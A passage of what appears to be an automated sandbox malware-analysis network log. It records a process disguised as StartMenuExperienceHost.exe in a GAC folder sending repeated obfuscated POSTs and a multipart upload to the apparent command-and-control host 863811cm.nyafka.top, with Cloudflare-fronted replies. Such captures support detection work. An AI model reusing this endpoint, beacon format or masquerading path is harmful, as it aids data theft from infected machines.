                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFj8ojR%2B3%2F3C7rVeT7lCoCRMIgyA1VUYnODEZAncxQGrh%2B8mk%2BzZR2KbM4AOna3Uw2eXRarek%2F0m%2Bha%2B0kDsS9Wxpj38ti3rpudVN%2FLv1NKd81EOSOyxnr29brTf39O1arO4Exjm"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fa3fd08c344-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                55192.168.2.550031188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:03.908034086 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:04.254245996 CEST2004OUTData Raw: 50 5a 5d 5f 54 58 58 55 5e 5a 55 58 51 56 5a 5a 57 5e 58 55 55 50 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PZ]_TXXU^ZUXQVZZW^XUUPQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9)=$?)?'='+ #+#[) !W#4'*C"8*+#Y$/\*-
                                                                Oct 11, 2024 01:37:04.354830027 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:04.601634979 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B1AYZj3Uf2n5SRzwFuZUNNoi9rqs4cidPhVkn1tTMvTG3k0Nw2MxgS%2Be3vLecjTCL%2B2S53yY3asfYdvwDJtrGAHMdZDTHD3yfbWPZuDpeLMhtvM3YcsULYhGvFAnjepmp228cfeu"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fa9ec6719fb-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 1b 29 39 3a 1e 23 2d 28 00 2c 21 02 59 2a 2d 2d 06 3f 57 33 10 26 34 24 05 2d 12 39 54 22 15 06 1a 3d 02 0c 59 33 02 0e 05 3c 21 2a 51 03 1b 39 1c 2b 33 34 0e 3f 31 35 16 29 21 32 06 33 0a 26 1c 3d 13 21 1f 30 3d 3d 01 22 21 20 55 29 3c 0e 0f 3b 38 2c 1b 2a 38 03 00 21 2b 2a 5f 08 13 39 57 2a 5e 3c 50 20 24 3d 59 22 13 11 1d 21 3a 3a 50 3e 17 0c 55 27 20 3c 59 2c 32 01 00 20 3f 24 09 36 3c 2d 0b 37 3e 2b 02 26 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98')9:#-(,!Y*--?W3&4$-9T"=Y3<!*Q9+34?15)!23&=!0=="! U)<;8,*8!+*_9W*^<P $=Y"!::P>U' <Y,2 ?$6<-7>+&"_")Q?TR0
                                                                Oct 11, 2024 01:37:04.707995892 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:04.803100109 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:04.806945086 CEST2004OUTData Raw: 55 5d 58 59 54 5e 5d 55 5e 5a 55 58 51 57 5a 58 57 5b 58 5b 55 5d 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]XYT^]U^ZUXQWZXW[X[U]Q\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(?81>+?5(6+/X) =V!48$[1R*$A!0*#Y$/\*)
                                                                Oct 11, 2024 01:37:05.109015942 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6dJ5havFNr9jHVrBe%2FjeNXCisPuoWcBhXds47DvNZjudh4BiGwATklEnHSadM93fOWKZahRVXv%2BGnHrNChrlGAiiKN1xvCucrbp3Yn3PsQXcY1PnqjEyKue2wkl1odmL4DFa102J"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6facb82519fb-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5e 2a 17 26 1e 23 3e 28 03 38 21 01 06 2b 3d 0c 16 3c 22 38 06 32 27 3c 04 2e 02 08 0c 22 15 01 01 29 12 26 5b 24 12 33 12 2b 1b 2a 51 03 1b 3a 01 3c 0a 33 13 3c 21 31 17 28 0c 3d 14 24 0d 35 08 29 04 32 0c 27 07 39 04 22 22 28 11 28 2f 3b 1e 2c 2b 0e 1b 3e 06 3e 1e 21 3b 2a 5f 08 13 39 56 2a 01 20 54 21 19 35 58 22 03 19 1f 35 3a 36 19 3d 39 21 08 24 33 2f 01 2c 54 3c 5b 34 06 23 1d 23 3c 25 0a 23 03 20 1e 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'^*&#>(8!+=<"82'<.")&[$3+*Q:<3<!1(=$5)2'9""((/;,+>>!;*_9V* T!5X"5:6=9!$3/,T<[4##<%# &"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                56192.168.2.550033188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:04.256517887 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:04.614065886 CEST2584OUTData Raw: 50 59 58 58 51 5c 5d 56 5e 5a 55 58 51 52 5a 5f 57 58 58 5a 55 57 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PYXXQ\]V^ZUXQRZ_WXXZUWQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y?(?W2.+5_5;8+U> '?P'=-R(8!1'(+#Y$/\*
                                                                Oct 11, 2024 01:37:04.710421085 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:04.953339100 CEST592INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gmj57GAtZsbvsV7ZKeojXFviBCYlUbbVUNlcNJ07%2F31WcvDEuMZsCuWKGolb6%2BDLMOFcToMh5vxPz3A%2BpMMwWH3C5GTsNuBu6FfSzhw4X%2FOje8iVY7guEbDbwYmTLM44VNat4D6f"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fac2f335e66-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a
                                                                Data Ascii: 44Z^Q
                                                                Oct 11, 2024 01:37:05.041728020 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                57192.168.2.550038188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:05.204978943 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:05.556689024 CEST2584OUTData Raw: 50 53 58 5a 51 58 58 5f 5e 5a 55 58 51 5c 5a 5c 57 59 58 59 55 55 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PSXZQXX_^ZUXQ\Z\WYXYUUQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X<=,]>)'W&X0B<%!,)3*47<3-&>8"2#=;#Y$/\*
                                                                Oct 11, 2024 01:37:05.679270983 CEST25INHTTP/1.1 100 Continue


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                58192.168.2.550039188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:05.230257988 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:05.582487106 CEST2004OUTData Raw: 55 5a 5d 54 51 5f 5d 53 5e 5a 55 58 51 51 5a 52 57 5c 58 5c 55 56 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UZ]TQ_]S^ZUXQQZRW\X\UVQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y(7>*02-;+6+50<#444$>2) F6+*;#Y$/\*1
                                                                Oct 11, 2024 01:37:05.679107904 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:05.923266888 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:05 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CQbz%2BvcrOJAMNG87ga6jG2EmKZRT5lDh1wsuFk2KVgX0UMAqR%2BRlb15rMF5WM03YdXvGk0ksGOcDqABgs5Ck7HNAg%2BFBi%2FER3Qp71Givrnnt2%2BvZCfFsBAQVBkBtwxy3wGh7fguQ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fb23a5a4325-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 07 3d 2a 2e 57 20 2d 2c 04 2c 22 30 5f 2a 03 32 5d 2b 08 2b 5b 31 24 24 05 3a 3c 2a 0c 22 05 2f 01 29 2f 36 11 27 12 20 05 29 21 2a 51 03 1b 3a 01 3c 1d 23 1c 3f 32 2e 05 2b 21 2d 59 27 30 35 43 3e 04 35 1c 24 2e 07 06 36 21 2c 53 29 2c 33 1e 2f 15 2c 1b 2a 2b 39 05 37 01 2a 5f 08 13 39 1c 3d 28 0a 1d 21 34 29 58 21 13 1e 0e 35 2a 29 0f 3d 29 0c 1d 25 30 27 00 2d 31 3f 02 34 2f 24 09 22 2f 31 0c 21 3d 02 13 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$=*.W -,,"0_*2]++[1$$:<*"/)/6' )!*Q:<#?2.+!-Y'05C>5$.6!,S),3/,*+97*_9=(!4)X!5*)=)%0'-1?4/$"/1!=%("_")Q?TR0
                                                                Oct 11, 2024 01:37:05.983911991 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:06.079022884 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:06.079160929 CEST540OUTData Raw: 55 5d 58 58 54 59 5d 53 5e 5a 55 58 51 5c 5a 5d 57 5a 58 5b 55 53 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]XXTY]S^ZUXQ\Z]WZX[USQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(=(Y?93R2;<&3!'X(= '=)(8G!#*#Y$/\*
                                                                Oct 11, 2024 01:37:06.354743004 CEST594INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RrfhZ6rC2KW2THZ0kgA9fXnaiRyv%2BAKNkt16F7uI%2FKeY0Mp0Of75mQIbcKk%2FIoK9AdDS0y0dEcpCaNB1WHLq29DYRX0VqEvNrdVRxg%2BN%2Fc4U1bzW3dpAwgfl8xYyGoiMTpmdVUIP"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fb4bddd4325-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a
                                                                Data Ascii: 44Z^Q
                                                                Oct 11, 2024 01:37:06.489177942 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Oct 11, 2024 01:37:06.489528894 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:06.584316969 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:06.585084915 CEST2584OUTData Raw: 50 5b 5d 58 51 5f 5d 56 5e 5a 55 58 51 5d 5a 5c 57 5b 58 5f 55 5d 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]XQ_]V^ZUXQ]Z\W[X_U]Q]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^)=$X<9'&-,E+"?3- 4'P'");7!Y*+#Y$/\*
                                                                Oct 11, 2024 01:37:06.983609915 CEST592INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GF1oKCSuOsZ%2BBKOmeccVt1d87Pl7rw7ey6paBYOMZz1gaEaGAExz%2ByKVNYCkoeg%2BdY63dzDVE2%2BKmX2BPiKz9hJm2TzwajpjunxQG6HxZfE9zIpTaGC9eWHM70SaY3FQCMjGiSBx"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fb7da734325-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a
                                                                Data Ascii: 44Z^Q
                                                                Oct 11, 2024 01:37:06.993226051 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Oct 11, 2024 01:37:06.993606091 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----Uf0Duz5iqJeMwKOEA54PhwnBHpLhjFY1V4
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 3014
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:07.087784052 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:07.087996006 CEST3014OUTData Raw: 2d 2d 2d 2d 2d 2d 55 66 30 44 75 7a 35 69 71 4a 65 4d 77 4b 4f 45 41 35 34 50 68 77 6e 42 48 70 4c 68 6a 46 59 31 56 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                Data Ascii: ------Uf0Duz5iqJeMwKOEA54PhwnBHpLhjFY1V4Content-Disposition: form-data; name="0"Content-Type: text/plainPSX_QXX_^ZUXQQZ]W^X^U]Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^P
                                                                Oct 11, 2024 01:37:07.353053093 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iIKCttJDGHqXpQ1nPEpjJ%2BRL1gXMXi7GvT6M1e1jcBxC4W%2Fj3cjnCcIobUmW%2FE46B5tTVNdEY2Hk6LvEKaPIvvF54IEwXEN%2BVgEK16000WsOuI3nl7OS%2FZYloTzWeMxZE2TdppIK"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fbb0ee64325-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:07.358457088 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:07.453560114 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:07.483588934 CEST2584OUTData Raw: 50 5b 5d 5d 54 58 5d 52 5e 5a 55 58 51 5c 5a 52 57 5e 58 5b 55 51 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]]TX]R^ZUXQ\ZRW^X[UQQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9\(-'(3&*%583[?U% 7<0=W>^ @!')+#Y$/\*
                                                                Oct 11, 2024 01:37:07.782557011 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DxnzDIgcd7uTmWafCEX7X5pzzLfsidM%2BiD09OIOVNB5N%2B2pgRgQn5ntUAnNK87JErMnLZ1xivF6GbkEjyCLlC%2FI6l1R2oqYVSvvtazU9KMEpraQbGnIMmm2A0eDBtZZqu3QQXGWK"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fbd49e44325-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                59192.168.2.550040188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:06.041860104 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:06.394593954 CEST1984OUTData Raw: 55 58 58 5f 54 54 5d 56 5e 5a 55 58 51 53 5a 59 57 5c 58 55 55 50 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UXX_TT]V^ZUXQSZYW\XUUPQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(>++T1+(Y"(#[)067B7R3*(,F"$^>#Y$/\*9
                                                                Oct 11, 2024 01:37:06.487096071 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:06.983251095 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrkWobDyb9vh3cy%2FE4%2FkuKNqTaznrs1xkqln0I5HN6stWuLnxzkqJbs2yf%2F2U22c5AvhExQoDJ2QS8wQgYvPuXpiKhhCdTe0hGm%2FhMCXzyHicBbysdL9SqGV5cvNUK8UmAoXjuK6"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6fb739654252-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 15 2a 2a 26 55 20 07 2f 59 2c 08 24 5a 29 5b 26 16 28 57 34 06 26 0a 3f 5f 3a 05 29 1e 35 5d 2c 17 28 3f 29 03 24 02 33 59 2b 21 2a 51 03 1b 3a 01 2b 33 30 09 3c 21 39 5a 3f 1c 31 5e 24 30 3d 0b 3e 2d 3e 0f 30 2e 22 15 35 31 2f 0f 3e 5a 27 54 2c 15 2b 40 3d 2b 3d 02 23 2b 2a 5f 08 13 3a 0e 28 38 0e 50 22 51 25 15 21 2d 3f 53 35 29 04 52 2a 00 39 0e 33 33 05 05 2f 31 20 10 34 01 3f 50 22 5a 36 56 34 04 33 00 25 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
